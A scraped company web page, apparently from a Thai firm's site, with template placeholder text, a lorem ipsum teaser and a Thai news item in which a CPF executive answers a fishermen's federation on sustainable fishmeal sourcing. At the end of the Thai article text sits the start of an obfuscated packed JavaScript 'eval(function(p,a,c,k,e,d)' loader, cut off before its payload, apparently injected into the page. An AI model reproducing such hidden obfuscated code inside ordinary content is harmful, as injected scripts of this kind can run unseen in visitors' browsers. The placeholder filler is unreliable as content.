Select Product By Category

Populate the sidearea with useful widgets. It’s simple to add images, categories, latest post, social media icon links, tag clouds, and more.
admin@cpe.co.th
Phone: 0-2675-9411 FAX: (02) 675-9674

June 2015

image

Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros...

Read More

  นายพงษ์ วิเศษไพฑูรย์ ประธานผู้บริหารฝ่ายปฏิบัติการ บริษัท เจริญโภคภัณฑ์อาหาร จำกัด (มหาชน) หรือ ซีพีเอฟ กล่าวชี้แจง หลังจากที่สมาพันธ์ชาวประมงพื้นบ้านแห่งประเทศไทย นำโดยนายบรรจง นะแส นายกสมาคมรักษ์ทะเล ยื่นข้อเสนอเรื่องการจัดหาวัตถุดิบปลาป่นของบริษัท ที่อาคารซี.พี.ทาวเวอร์สีลม เมื่อเช้านี้ ว่า บริษัทเป็นเพียงผู้รับซื้อวัตถุดิบจากโรงงานปลาป่น และไม่ได้เป็นเจ้าของหรือดำเนินธุรกิจเรือประมงแต่อย่างใด อย่างไรก็ตาม ในฐานะที่เป็นหนึ่งห่วงโซ่การผลิต บริษัทจึงได้ร่วมมือกับภาคส่วนต่างๆ ทั้งโรงงานปลาป่น ภาครัฐและภาคสังคมต่างๆ ในการดำเนินนโยบายจัดหาอย่างยั่งยืน นายพงษ์ กล่าวถึงข้อเสนอดังกล่าวมีสาระอันเป็นประโยชน์ต่อการดำรงอยู่ของทรัพยากรและ สิ่งแวดล้อมทางทะเลอย่างยั่งยืน บริษัทยินดีสนับสนุนข้อเรียกร้องดังกล่าวซึ่งสอดคล้องกับนโยบายของบริษัทฯ ในด้านการจัดหาอย่างยั่งยืน ที่บริษัทฯ ได้ดำเนินการมาอย่างต่อเนื่อง เช่น ระบบทวนสอบย้อนกลับแหล่งที่มาปลาป่นว่ามาจากการประมงที่ถูกต้องตามกฎหมาย มีการควบคุมและการรายงาน (ระบบ Non-IUU) มีการใช้แรงงานที่ถูกต้อง การส่งเสริมให้คู่ค้าได้รับมาตรฐานด้านความยั่งยืนระดับสากลในการผลิตปลาป่น (IFFO RS CoC) ตลอด จนร่วมกับผู้มีส่วนได้ส่วนเสียในห่วงโซ่อุปทานสินค้าประมงจัดทำโครงการ พัฒนาการประมงภาพรวมของประเทศไทยให้เกิดความยั่งยืน และการลดการใช้ปลาป่นและพัฒนาวัตถุดิบทดแทน โดยล่าสุดได้ดำเนินการส่งมอบนโยบายการจัดหาอย่างยั่งยืนสู่คู่ค้าธุรกิจตาม แผนแม่บทที่บริษัทกำหนดไว้และจะดำเนินการประเมินผลการปฏิบัติต่อไป นายพงษ์ กล่าวต่อว่า ประเด็นความยั่งยืนของท้องทะเลไทยจำเป็นต้องอาศัยความร่วมมือจากทุกภาคส่วน เพื่อขับเคลื่อนให้เกิดผลในทางปฏิบัติอย่างถูกต้องและเป็นที่ยอมรับของทุก ฝ่าย โดยในส่วนของบริษัทฯ จะใช้ความพยายามอย่างเต็มที่ในการดำเนินงานดังกล่าวข้างต้นให้บรรลุตามเป้า ประสงค์ทุกประการ นอกจากนี้บริษัท ยังให้ความสำคัญกับการดำเนินธุรกิจเพื่อร่วมสร้างความยั่งยืนของสิ่งแวดล้อม และทรัพยากรธรรมชาติมาโดยตลอด ตามนโยบายด้านการจัดหาวัตถุดิบยั่งยืน ล่าสุดได้ส่งมอบนโยบายการจัดซื้อกับคู่ค้าธุรกิจตลอดห่วงโซ่อุปทาน เพื่อนำเศรษฐกิจ สังคม และสิ่งแวดล้อมเติบโตร่วมกัน eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...

Read More